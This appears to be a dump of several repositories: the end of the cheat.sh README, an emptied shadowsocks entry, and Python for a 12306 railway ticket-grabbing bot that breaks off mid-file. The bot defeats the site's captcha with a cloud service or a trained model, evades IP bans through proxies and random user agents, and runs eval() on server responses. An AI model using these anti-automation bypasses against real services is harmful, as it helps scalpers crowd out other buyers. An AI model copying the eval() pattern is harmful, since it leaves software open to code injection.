from [VSCode Marketplace](https://marketplace.visualstudio.com/items?itemName=vscode-snippet.Snippet) Usage: 1. Hit <kbd>⌘ Command</kbd> + <kbd>⇧ Shift</kbd> + <kbd>p</kbd> 2. Run `Snippet: Find`. 3. Type your query and hit enter. [![vscode-snippet](https://cheat.sh/files/vscode-snippet-demo.gif)](https://github.com/mre/vscode-snippet) *(GIF courtesy: Matthias Endler, @mre)* ### Sublime * [cheat.sh-sublime-plugin](https://github.com/gauravk-in/cheat.sh-sublime-plugin/) Usage: 1. Write your query string. 2. Select the query string. 3. Press <kbd>Cmd</kbd> + <kbd>⇧ Shift</kbd> + <kbd>B</kbd> to replace the selected query string by the answer generated from `cht.sh`. [![cheat.sh-sublime-plugin-demo](https://cheat.sh/files/demo-sublime.gif)](https://github.com/gauravk-in/cheat.sh-sublime-plugin) *(GIF courtesy: Gaurav Kukreja, @gauravk-in)* ### IntelliJ IDEA * [idea-cheatsh-plugin](https://github.com/szymonprz/idea-cheatsh-plugin) * Install from [idea plugins marketplace](https://plugins.jetbrains.com/plugin/11942-cheat-sh-code-snippets) Usage: 1. Write query string 2. Select the query string 3. Press keyboard shortcut <kbd>Alt</kbd> + <kbd>C</kbd> , <kbd>S</kbd> to replace the selected query string by the answer [![idea-cheatsh-plugin](https://cheat.sh/files/idea-demo.gif)](https://github.com/szymonprz/idea-cheatsh-plugin) *(GIF courtesy: Szymon Przebierowski, @szymonprz)* ### QtCreator * [cheatsh-qtcreator](https://github.com/pozemka/cheatsh-qtcreator) Current features: * search word under cursor * search selected * query search * disable comments * paste answer (?TQ version) * custom server URL * custom search context (default is cpp) * hotkeys and menu [![cheatsh-qtcreator](https://user-images.githubusercontent.com/1259724/73876361-ecce5d00-4867-11ea-9f75-c5b127a9739c.gif)](https://github.com/pozemka/cheatsh-qtcreator) *(GIF courtesy: Pozemka, @pozemka)* ## Special pages There are several special pages that are not cheat sheets. Their names start with colon and have special meaning. Getting started: ``` :help description of all special pages and options :intro cheat.sh introduction, covering the most important usage questions :list list all cheat sheets (can be used in a subsection too: /go/:list) ``` Command line client `cht.sh` and shells support: ``` :cht.sh code of the cht.sh client :bash_completion bash function for tab completion :bash bash function and tab completion setup :fish fish function and tab completion setup :zsh zsh function and tab completion setup ``` Editors support: ``` :vim cheat.sh support for Vim :emacs cheat.sh function for Emacs :emacs-ivy cheat.sh function for Emacs (uses ivy) ``` Other pages: ``` :post how to post new cheat sheet :styles list of color styles :styles-demo show color styles usage examples :random fetches a random page (can be used in a subsection too: /go/:random) ``` ## Search To search for a keyword, use the query: ``` /~keyword ``` In this case search is not recursive — it is conducted only in a page of the specified level. For example: ``` /~snapshot look for snapshot in the first level cheat sheets /scala/~currying look for currying in scala cheat sheets ``` For a recursive search in all cheat sheets, use double slash: ``` /~snapshot/r look for snapshot in all cheat sheets ``` You can use special search options after the closing slash: ``` /~shot/bi case insensitive (i), word boundaries (b) ``` List of search options: ``` i case insensitive search b word boundaries r recursive search ``` ## Programming languages cheat sheets Cheat sheets related to programming languages are organized in namespaces (subdirectories), that are named according to the programming language. For each supported programming language there are several special cheat sheets: its own sheet, `hello`, `:list` and `:learn`. Say for lua it will look like: ``` lua lua/hello lua/:list lua/:learn ``` Some languages has the one-liners-cheat sheet, `1line`: ``` perl/1line ``` * `hello` describes how you can start with the language — install it if needed, build and run its programs, and it shows the "Hello world" program written in the language; * `:list` shows all topics related to the language * `:learn` shows a learn-x-in-minutes language cheat sheet perfect for getting started with the language. * `1line` is a collection of one-liners in this language * `weirdness` is a collection of examples of weird things in this language ![cheat.sh usage](http://cheat.sh/files/supported-languages-c++.png) At the moment, cheat.sh covers the 58 following programming languages (alphabetically sorted): |Prefix |Language |Basics|One-liners|Weirdness|StackOverflow| |-----------|----------|------|----------|---------|-------------| |`arduino/` |Arduino | | | |✓ | |`assembly/`|Assembly | | | |✓ | |`awk/` |AWK |✓ | | |✓ | |`bash/` |Bash |✓ | | |✓ | |`basic/` |BASIC | | | |✓ | |`bf/` |Brainfuck |✓ | | |✓ | |`c/` |C |✓ | | |✓ | |`chapel/` |Chapel |✓ | | |✓ | |`clean/` |Clean | | | |✓ | |`clojure/` |Clojure |✓ | | |✓ | |`coffee/` |CoffeeScript|✓ | | |✓ | |`cpp/` |C++ |✓ | | |✓ | |`csharp/` |C# |✓ | | |✓ | |`d/` |D |✓ | | |✓ | |`dart/` |Dart |✓ | | |✓ | |`delphi/` |Dephi | | | |✓ | |`dylan/` |Dylan |✓ | | |✓ | |`eiffel/` |Eiffel | | | |✓ | |`elixir/` |Elixir |✓ | | |✓ | |`elisp/` |ELisp |✓ | | |✓ | |`elm/` |Elm |✓ | | |✓ | |`erlang/` |Erlang |✓ | | |✓ | |`factor/` |Factor |✓ | | |✓ | |`fortran/` |Fortran |✓ | | |✓ | |`forth/` |Forth |✓ | | |✓ | |`fsharp/` |F# |✓ | | |✓ | |`go/` |Go |✓ | | |✓ | |`groovy/` |Groovy |✓ | | |✓ | |`haskell/` |Haskell |✓ | | |✓ | |`java/` |Java |✓ | | |✓ | |`js/` |JavaScript|✓ |✓ |✓ |✓ | |`julia/` |Julia |✓ | | |✓ | |`kotlin/` |Kotlin |✓ | | |✓ | |`latex/` |LaTeX |✓ | | |✓ | |`lisp/` |Lisp |✓ | | |✓ | |`lua/` |Lua |✓ | | |✓ | |`matlab/` |MATLAB |✓ | | |✓ | |`nim/` |Nim |✓ | | |✓ | |`ocaml/` |OCaml |✓ | | |✓ | |`octave/` |Octave |✓ | | |✓ | |`perl/` |Perl |✓ |✓ | |✓ | |`perl6/` |Perl 6 |✓ |✓ | |✓ | |`php/` |PHP |✓ | | |✓ | |`pike/` |Pike | | | |✓ | |`python/` |Python |✓ |✓ | |✓ | |`python3/` |Python 3 |✓ | | |✓ | |`r/` |R |✓ | | |✓ | |`racket/` |Racket |✓ | | |✓ | |`ruby/` |Ruby |✓ | | |✓ | |`rust/` |Rust |✓ | | |✓ | |`scala/` |Scala |✓ | | |✓ | |`scheme/` |Scheme |✓ | | |✓ | |`solidity/`|Solidity |✓ | | |✓ | |`swift/` |Swift |✓ | | |✓ | |`tcsh/` |Tcsh |✓ | | |✓ | |`tcl/` |Tcl |✓ | | |✓ | |`objective-c/`|Objective-C|✓ | | |✓ | |`vb/` |VisualBasic|✓ | | |✓ | |`vbnet/` |VB.Net |✓ | | |✓ | And several other topics, that are though related to programming, are not programming languages: |Prefix |Topic |Basics|StackOverflow| |-----------|----------|------|-------------| |`cmake/` |CMake |✓ |✓ | |`django/` |Django | |✓ | |`flask/` |Flask | |✓ | |`git/` |Git |✓ |✓ | ## Cheat sheets sources Instead of creating yet another mediocre cheat sheet repository, we are concentrating our efforts on creation of a unified mechanism to access selected existing well developed and good maintained cheat sheet repositories covering topics of our interest: programming and operating systems usage. *cheat.sh* uses selected community driven cheat sheet repositories and information sources, maintained by thousands of users, developers and authors all over the world (in the *Users* column number of contributors/number of stars is shown): |Cheat sheets |Repository |C/U* |Stars |Creation Date| |-----------------------|------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------|-------------| |UNIX/Linux, programming|[cheat.sheets](https://github.com/chubin/cheat.sheets) |![](https://img.shields.io/github/contributors-anon/chubin/cheat.sheets?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/chubin/cheat.sheets?label=%E2%AD%90&labelColor=white) |May 1, 2017 | |UNIX/Linux commands |[tldr-pages/tldr](https://github.com/tldr-pages/tldr) |![](https://img.shields.io/github/contributors-anon/tldr-pages/tldr?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/tldr-pages/tldr?label=%E2%AD%90&labelColor=white) |Dec 8, 2013 | |UNIX/Linux commands |[chrisallenlane/cheat](https://github.com/chrisallenlane/cheat) |![](https://img.shields.io/github/contributors-anon/chrisallenlane/cheat?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/chrisallenlane/cheat?label=%E2%AD%90&labelColor=white) |Jul 28, 2013 | |Programming languages |[adambard/learnxinyminutes-docs](https://github.com/adambard/learnxinyminutes-docs) |![](https://img.shields.io/github/contributors-anon/adambard/learnxinyminutes-docs?label=%F0%9F%91%A5&labelColor=white)|![](https://img.shields.io/github/stars/adambard/learnxinyminutes-docs?label=%E2%AD%90&labelColor=white)|Jun 23, 2013 | |Go |[a8m/go-lang-cheat-sheet](https://github.com/a8m/go-lang-cheat-sheet) |![](https://img.shields.io/github/contributors-anon/a8m/go-lang-cheat-sheet?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/a8m/go-lang-cheat-sheet?label=%E2%AD%90&labelColor=white) |Feb 9, 2014 | |Perl |[pkrumnis/perl1line.txt](https://github.com/pkrumins/perl1line.txt) |![](https://img.shields.io/github/contributors-anon/pkrumins/perl1line.txt?label=%F0%9F%91%A5&labelColor=white) |![](https://img.shields.io/github/stars/pkrumins/perl1line.txt?label=%E2%AD%90&labelColor=white) |Nov 4, 2011 | |Programming languages |[StackOverflow](https://stackoverflow.com) |[14M](https://stackexchange.com/leagues/1/alltime/stackoverflow) |N/A |Sep 15, 2008 | <sup>(*) C/U — contributors for GitHub repositories, Users for Stackoverflow</sup> Pie diagram reflecting cheat sheets sources distribution (by number of cheat sheets on cheat.sh originating from a repository): ![cheat.sh cheat sheets repositories](http://cheat.sh/files/stat-2017-06-05.png) ## How to contribute ### How to edit a cheat sheet If you want to edit a cheat.sh cheat sheet, you should edit it in the upstream repository. You will find the name of the source repository in a browser when you open a cheat sheet. There are two github buttons at the bottom of the page: the second one is the button of the repository, which belongs the current cheat sheet. You can edit the cheat sheet directly in your browser (you need a github account for it). There is an edit button in the top right corner. If you click on it, an editor will be open. There you will change the cheat sheet (under the hood: the upstream repository is forked, your changes are committed in the forked repository, a pull request to the upstream repository owner is sent). ![cheat.sh cheat sheets repositories](http://cheat.sh/files/edit-cheat-sheet.png) ### How to add a cheat sheet If you want to add a cheat sheet, you have one of the following ways: * Add it to one of the external cheat sheets repositories; you should decide on your own what is the best repository for your cheat sheet; * Add it to the local cheat.sh repository ([cheat.sheets](https://github.com/chubin/cheat.sheets)) on github (fork, commit, pull request); * Post it on cheat.sh using curl or a web browser ([cheat.sh/:post](http://cheat.sh/:post)). If you want to change an existing cheat sheet, you have to find the original repository (when you open a cheat sheet in a browser, you see the repository's github button in the bottom of the cheat sheet), the cheat sheet is coming from, and change it there. After some time the changes will be synchronized on cheat.sh. ### How to add a cheat sheet repository If you want to add a cheat sheet repository to cheat.sh, please open an issue: * [Add a new repository](https://github.com/chubin/cheat.sh/issues/new) Please specify the name of the repository, and give its short description. ## Installation and standalone usage You don't need to install anything, to start using *cheat.sh*. There are two cases, when you want to install *cheat.sh* locally: 1. You plan to use it off-line, without Internet access; 2. You want to use your own cheat sheets (additionally, or as a replacement). Installation process in described in details here: [cheat.sh standalone installation](doc/standalone.md)
shadowsocks
938bba32a4008bdde9c064dda6a0597987ddef54
Removed according to regulations.
12306
a495af88346a0d794493c6030f6a6207debb5824
File: run.py # -*- coding=utf-8 -*- import argparse import sys def parser_arguments(argv): """ 不应该在这里定义,先放在这里 :param argv: :return: """ parser = argparse.ArgumentParser() parser.add_argument("operate", type=str, help="r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱需要打开开关") return parser.parse_args(argv) if __name__ == '__main__': args = parser_arguments(sys.argv[1:]) if args.operate == "r": from init import select_ticket_info select_ticket_info.select().main() elif args.operate == "t": from config.emailConf import sendEmail from config.serverchanConf import sendServerChan sendEmail(u"订票小助手测试一下") sendServerChan("订票小助手测试一下") elif args.operate == "c": from agency.cdn_utils import filterCdn filterCdn() File: TickerConfig.py # -*- coding=utf-8 -*- # 关于软件使用配置说明,一定要看!!! # ps: 如果是候补车票,需要通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验 # 关于候补了之后是否还能继续捡漏的问题在此说明: 软件为全自动候补加捡漏,如果软件候补成功则会停止抢票,发出邮件通知,但是不会影响你继续捡漏, # 如果这个时候捡漏捡到的话,也是可以付款成功的,也就是说,捡漏+候补,可以最大程度提升抢票成功率 # 刷票模式:1=刷票 2=候补+刷票 TICKET_TYPE = 1 # 出发日期(list) "2018-01-06", "2018-01-07" STATION_DATES = [ "2020-01-18" ] # 填入需要购买的车次(list),"G1353" # 修改车次填入规则,注:(以前设置的车次逻辑不变),如果车次填入为空,那么就是当日乘车所有车次都纳入筛选返回 # 不填车次是整个list为空才算,如果不是为空,依然会判断车次的,这种是错误的写法 [""], 正确的写法 [] STATION_TRAINS = [] # 出发城市,比如深圳北,就填深圳就搜得到 FROM_STATION = "广州南" # 到达城市 比如深圳北,就填深圳就搜得到 TO_STATION = "隆回" # 座位(list) 多个座位ex: # "商务座", # "一等座", # "二等座", # "特等座", # "软卧", # "硬卧", # "硬座", # "无座", # "动卧", SET_TYPE = ["二等座"] # 当余票小于乘车人,如果选择优先提交,则删减联系人和余票数一致在提交 # bool IS_MORE_TICKET = True # 乘车人(list) 多个乘车人ex: # "张三", # "李四" TICKET_PEOPLES = [] # 12306登录账号 USER = "" PWD = "" # 加入小黑屋时间默认为5分钟,此功能为了防止僵尸票导致一直下单不成功错过正常的票 TICKET_BLACK_LIST_TIME = 5 # 自动打码 IS_AUTO_CODE = True # 设置2本地自动打码,需要配置tensorflow和keras库,3为云打码,由于云打码服务器资源有限(为2h4C的cpu服务器),请不要恶意请求,不然只能关闭服务器 # ps: 请不要一直依赖云服务器资源,在此向所有提供服务器同学表示感谢 AUTO_CODE_TYPE = 3 # 此处设置云打码服务器地址,如果有自建的服务器,可以自行更改 HOST = "120.77.154.140:8000" REQ_URL = "/verify/base64/" HTTP_TYPE = "http" # HOST="12306.yinaoxiong.cn" #备用服务器稳定性较差 # REQ_URL="/verify/base64/" # HTTP_TYPE="https" # 邮箱配置,如果抢票成功,将通过邮件配置通知给您 # 列举163 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "xxxxx # host: "smtp.163.com" # 列举qq ,qq设置比较复杂,需要在邮箱-->账户-->开启smtp服务,取得授权码==邮箱登录密码 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "授权码" # host: "smtp.qq.com" EMAIL_CONF = { "IS_MAIL": True, "email": "", "notice_email_list": "", "username": "", "password": "", "host": "smtp.qq.com", } # 是否开启 server酱 微信提醒, 使用前需要前往 http://sc.ftqq.com/3.version 扫码绑定获取 SECRET 并关注获得抢票结果通知的公众号 SERVER_CHAN_CONF = { "is_server_chan": False, "secret": "" } # 是否开启cdn查询,可以更快的检测票票 1为开启,2为关闭 IS_CDN = 1 # 下单接口分为两种,1 模拟网页自动捡漏下单(不稳定),2 模拟车次后面的购票按钮下单(稳如老狗) ORDER_TYPE = 2 # 下单模式 1 为预售,整点刷新,刷新间隔0.1-0.5S, 然后会校验时间,比如12点的预售,那脚本就会在12.00整检票,刷新订单 # 2 是捡漏,捡漏的刷新间隔时间为0.5-3秒,时间间隔长,不容易封ip ORDER_MODEL = 1 # 是否开启代理, 0代表关闭, 1表示开始 # 开启此功能的时候请确保代理ip是否可用,在测试放里面经过充分的测试,再开启此功能,不然可能会耽误你购票的宝贵时间 # 使用方法: # 1、在agency/proxy_list列表下填入代理ip # 2、测试UnitTest/TestAll/testProxy 测试代理是否可以用 # 3、开启代理ip IS_PROXY = 0 # 预售放票时间, 如果是捡漏模式,可以忽略此操作 OPEN_TIME = "12:59:57" # 1=使用selenium获取devicesID # 2=使用网页端/otn/HttpZF/logdevice获取devicesId,这个接口的算法目前可能有点问题,如果登录一直302的请改为配置1 # 3=自己打开浏览器在headers-Cookies中抓取RAIL_DEVICEID和RAIL_EXPIRATION,这个就不用配置selenium COOKIE_TYPE = 3 # 如果COOKIE_TYPE=1,则需配置chromeDriver路径,下载地址http://chromedriver.storage.googleapis.com/index.html # chromedriver配置版本只要和chrome的大版本匹配就行 CHROME_PATH = "/usr/src/app/chromedriver" # 为了docker37 准备的环境变量,windows环境可以不用管这个参数 CHROME_CHROME_PATH = "/opt/google/chrome/google-chrome" # 如果COOKIE_TYPE=3, 则需配置RAIL_EXPIRATION、RAIL_DEVICEID的值 RAIL_EXPIRATION = "" RAIL_DEVICEID = "" # RAIL_EXPIRATION = "1577034103293" # RAIL_DEVICEID = "CDno29Erc_Pf3FSXb4dzq-Op64EhWrsi5yUZKVIKR1MAfYo2qFlCeXD8VkexY7_1qg-ClV-fE8j9jgVlPZxRh3wVc2iqLe_5A8sdr62qZx4B22JPF8lFCjpgTKZ5ODW90HJd5tiQsJ1KR9nOqHRxHj1FT5LEIwfw" # 1=>为一直随机ua,2->只启动的时候随机一次ua RANDOM_AGENT = 2 PASSENGER_TICKER_STR = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } # 保护12306官网请求频率,设置随机请求时间,原则为5分钟不大于80次 # 最大间隔请求时间 MAX_TIME = 3 # 最小间隔请求时间 MIN_TIME = 1 # 软件版本 RE_VERSION = "1.2.004" File: __init__.py File: init/__init__.py File: init/select_ticket_info.py # -*- coding=utf-8 -*- import datetime import random import os import socket import sys import threading import time import TickerConfig import wrapcache from agency.cdn_utils import CDNProxy, open_cdn_file from config import urlConf, configCommon from config.TicketEnmu import ticket from config.configCommon import seat_conf_2, seat_conf from config.getCookie import getDrvicesID from init.login import GoLogin from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest from inter.ChechFace import chechFace from inter.CheckUser import checkUser from inter.GetPassengerDTOs import getPassengerDTOs from inter.LiftTicketInit import liftTicketInit from inter.Query import query from inter.SubmitOrderRequest import submitOrderRequest from myException.PassengerUserException import PassengerUserException from myException.UserPasswordException import UserPasswordException from myException.ticketConfigException import ticketConfigException from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException from myUrllib.httpUtils import HTTPClient class select: """ 快速提交车票通道 """ def __init__(self): self.cdn_list = open_cdn_file("filter_cdn_list") self.get_ticket_info() self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE] self.auto_code_type = TickerConfig.AUTO_CODE_TYPE self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list) self.httpClint.cdn = self.cdn_list[random.randint(0, 4)] self.urls = urlConf.urls self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type) self.cookies = "" self.queryUrl = "leftTicket/queryO" self.passengerTicketStrList = "" self.passengerTicketStrByAfterLate = "" self.oldPassengerStr = "" self.set_type = "" self.flag = True @staticmethod def get_ticket_info(): """ 获取配置信息 :return: """ print(u"*" * 50) print(f"检查当前版本为: {TickerConfig.RE_VERSION}") version = sys.version.split(" ")[0] print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version)) if version < "3.6.0": raise Exception print(u"12306刷票小助手,最后更新于2019.09.18,请勿作为商业用途,交流群号:" u" 1群:286271084(已满)\n" u" 2群:649992274(已满)\n" u" 3群:632501142(已满)\n" u" 4群: 606340519(已满)\n" u" 5群: 948526733(已满)\n" u" 7群: 660689659(已满)\n" u" 8群: 620629239(已满)\n" u" 6群: 608792930(未满)\n" u" 9群: 693035807(未满)\n" ) print( f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \ f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}") print(u"*" * 50) def station_table(self, from_station, to_station): """ 读取车站信息 :param station: :return: """ path = os.path.join(os.path.dirname(__file__), '../station_name.txt') try: with open(path, encoding="utf-8") as result: info = result.read().split('=')[1].strip("'").split('@') except Exception: with open(path) as result: info = result.read().split('=')[1].strip("'").split('@') del info[0] station_name = {} for i in range(0, len(info)): n_info = info[i].split('|') station_name[n_info[1]] = n_info[2] try: from_station = station_name[from_station.encode("utf8")] to_station = station_name[to_station.encode("utf8")] except KeyError: from_station = station_name[from_station] to_station = station_name[to_station] return from_station, to_station def call_login(self, auth=False): """ 登录回调方法 :return: """ if auth: return self.login.auth() else: configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠 self.login.go_login() def main(self): l = liftTicketInit(self) l.reqLiftTicketInit() getDrvicesID(self) self.call_login() check_user = checkUser(self) t = threading.Thread(target=check_user.sendCheckUser) t.setDaemon(True) t.start() from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION) num = 0 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES) passenger = s.sendGetPassengerDTOs() wrapcache.set("user_info", passenger, timeout=9999999) now = datetime.datetime.now() if TickerConfig.ORDER_MODEL is 1: print(f"预售还未开始,阻塞中,预售时间为{TickerConfig.OPEN_TIME}, 当前时间为: {now.strftime('%H:%M:%S')}") sleep_time_s = 0.1 sleep_time_t = 0.3 # 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案 while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME: now = datetime.datetime.now() time.sleep(0.0001) print(f"预售开始,开启时间为: {now.strftime('%H:%M:%S')}") else: sleep_time_s = TickerConfig.MIN_TIME sleep_time_t = TickerConfig.MAX_TIME while 1: try: num += 1 now = datetime.datetime.now() # 感谢群里大佬提供整点代码 configCommon.checkSleepTime(self) # 晚上到点休眠 q = query(selectObj=self, from_station=from_station, to_station=to_station, from_station_h=TickerConfig.FROM_STATION, to_station_h=TickerConfig.TO_STATION, _station_seat=self._station_seat, station_trains=TickerConfig.STATION_TRAINS, station_dates=TickerConfig.STATION_DATES, ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES), ) queryResult = q.sendQuery() # 查询接口 if queryResult.get("status"): train_no = queryResult.get("train_no", "") train_date = queryResult.get("train_date", "") stationTrainCode = queryResult.get("stationTrainCode", "") secretStr = queryResult.get("secretStr", "") secretList = queryResult.get("secretList", "") seat = queryResult.get("seat", "") leftTicket = queryResult.get("leftTicket", "") query_from_station_name = queryResult.get("query_from_station_name", "") query_to_station_name = queryResult.get("query_to_station_name", "") is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES)) if wrapcache.get(train_no): print(ticket.QUEUE_WARNING_MSG.format(train_no)) else: # 获取联系人 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES, set_type="" if isinstance(seat, list) else seat_conf_2[seat], # 候补订单需要设置多个坐席 is_more_ticket_num=is_more_ticket_num) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList) if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get( "passengerTicketStrByAfterLate", "") self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "") self.set_type = getPassengerDTOsResult.get("set_type", "") # 提交订单 # 订单分为两种,一种为抢单,一种为候补订单 if secretStr: # 正常下单 if TickerConfig.ORDER_TYPE == 1: # 快速下单 a = autoSubmitOrderRequest(selectObj=self, secretStr=secretStr, train_date=train_date, passengerTicketStr=self.passengerTicketStrList, oldPassengerStr=self.oldPassengerStr, train_no=train_no, stationTrainCode=stationTrainCode, leftTicket=leftTicket, set_type=self.set_type, query_from_station_name=query_from_station_name, query_to_station_name=query_to_station_name, ) a.sendAutoSubmitOrderRequest() elif TickerConfig.ORDER_TYPE == 2: # 普通下单 sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, train_date, TickerConfig.TICKET_PEOPLES) sor.sendSubmitOrderRequest() elif secretList: # 候补订单 c = chechFace(self, secretList, train_no) c.sendChechFace() else: random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2) nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else "" print(f"正在第{num}次查询 停留时间:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}") time.sleep(random_time) except PassengerUserException as e: print(e) break except ticketConfigException as e: print(e) break except ticketIsExitsException as e: print(e) break except ticketNumOutException as e: print(e) break except UserPasswordException as e: print(e) break except ValueError as e: if e == "No JSON object could be decoded": print(u"12306接口无响应,正在重试") else: print(e) except KeyError as e: print(e) except TypeError as e: print(u"12306接口无响应,正在重试 {0}".format(e)) except socket.error as e: print(e) if __name__ == '__main__': s = select() cdn = s.station_table("长沙", "深圳") File: init/login.py # -*- coding=utf-8 -*- import copy import time from collections import OrderedDict from time import sleep import TickerConfig from inter.GetPassCodeNewOrderAndLogin import getPassCodeNewOrderAndLogin1 from inter.GetRandCode import getRandCode from inter.LoginAysnSuggest import loginAysnSuggest from inter.LoginConf import loginConf from myException.UserPasswordException import UserPasswordException class GoLogin: def __init__(self, session, is_auto_code, auto_code_type): self.session = session self.randCode = "" self.is_auto_code = is_auto_code self.auto_code_type = auto_code_type def auth(self): """ :return: """ self.session.httpClint.send(self.session.urls["loginInitCdn1"]) uamtkStaticUrl = self.session.urls["uamtk-static"] uamtkStaticData = {"appid": "otn"} return self.session.httpClint.send(uamtkStaticUrl, uamtkStaticData) def codeCheck(self): """ 验证码校验 :return: """ codeCheckUrl = copy.deepcopy(self.session.urls["codeCheck1"]) codeCheckUrl["req_url"] = codeCheckUrl["req_url"].format(self.randCode, int(time.time() * 1000)) fresult = self.session.httpClint.send(codeCheckUrl) if not isinstance(fresult, str): print("登录失败") return fresult = eval(fresult.split("(")[1].split(")")[0]) if "result_code" in fresult and fresult["result_code"] == "4": print(u"验证码通过,开始登录..") return True else: if "result_message" in fresult: print(fresult["result_message"]) sleep(1) self.session.httpClint.del_cookies() def baseLogin(self, user, passwd): """ 登录过程 :param user: :param passwd: :return: 权限校验码 """ logurl = self.session.urls["login"] loginData = OrderedDict() loginData["username"] = user, loginData["password"] = passwd, loginData["appid"] = "otn", loginData["answer"] = self.randCode, tresult = self.session.httpClint.send(logurl, loginData) if 'result_code' in tresult and tresult["result_code"] == 0: print(u"登录成功") tk = self.auth() if "newapptk" in tk and tk["newapptk"]: return tk["newapptk"] else: return False elif 'result_message' in tresult and tresult['result_message']: messages = tresult['result_message'] if messages.find(u"密码输入错误") is not -1: raise UserPasswordException("{0}".format(messages)) else: print(u"登录失败: {0}".format(messages)) print(u"尝试重新登陆") return False else: return False def getUserName(self, uamtk): """ 登录成功后,显示用户名 :return: """ if not uamtk: return u"权限校验码不能为空" else: uamauthclientUrl = self.session.urls["uamauthclient"] data = {"tk": uamtk} uamauthclientResult = self.session.httpClint.send(uamauthclientUrl, data) if uamauthclientResult: if "result_code" in uamauthclientResult and uamauthclientResult["result_code"] == 0: print(u"欢迎 {} 登录".format(uamauthclientResult["username"])) return True else: return False else: self.session.httpClint.send(uamauthclientUrl, data) url = self.session.urls["getUserInfo"] self.session.httpClint.send(url) def go_login(self): """ 登陆 :param user: 账户名 :param passwd: 密码 :return: """ user, passwd = TickerConfig.USER, TickerConfig.PWD if not user or not passwd: raise UserPasswordException(u"温馨提示: 用户名或者密码为空,请仔细检查") login_num = 0 while True: if loginConf(self.session): result = getPassCodeNewOrderAndLogin1(session=self.session, imgType="login") if not result: continue self.randCode = getRandCode(self.is_auto_code, self.auto_code_type, result) print(self.randCode) login_num += 1 self.auth() if self.codeCheck(): uamtk = self.baseLogin(user, passwd) if uamtk: self.getUserName(uamtk) break else: loginAysnSuggest(self.session, username=user, password=passwd) login_num += 1 break File: verify/mlearn_for_image.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import sys import cv2 import numpy as np from keras import models from keras import layers from keras import optimizers from keras.applications import VGG16 from keras.callbacks import ReduceLROnPlateau from keras.preprocessing.image import ImageDataGenerator def preprocess_input(x): x = x.astype('float32') # 我是用cv2来读取的图片,其已经是BGR格式了 mean = [103.939, 116.779, 123.68] x -= mean return x def load_data(): # 这是统计学专家提供的训练集 data = np.load('captcha.npz') train_x, train_y = data['images'], data['labels'] train_x = preprocess_input(train_x) # 由于是统计得来的信息,所以在此给定可信度 sample_weight = train_y.max(axis=1) / np.sqrt(train_y.sum(axis=1)) sample_weight /= sample_weight.mean() train_y = train_y.argmax(axis=1) # 这是人工提供的验证集 data = np.load('captcha.test.npz') test_x, test_y = data['images'], data['labels'] test_x = preprocess_input(test_x) return (train_x, train_y, sample_weight), (test_x, test_y) def learn(): (train_x, train_y, sample_weight), (test_x, test_y) = load_data() datagen = ImageDataGenerator(horizontal_flip=True, vertical_flip=True) train_generator = datagen.flow(train_x, train_y, sample_weight=sample_weight) base = VGG16(weights='imagenet', include_top=False, input_shape=(None, None, 3)) for layer in base.layers[:-4]: layer.trainable = False model = models.Sequential([ base, layers.BatchNormalization(), layers.Conv2D(64, (3, 3), activation='relu', padding='same'), layers.GlobalAveragePooling2D(), layers.BatchNormalization(), layers.Dense(64, activation='relu'), layers.BatchNormalization(), layers.Dropout(0.20), layers.Dense(80, activation='softmax') 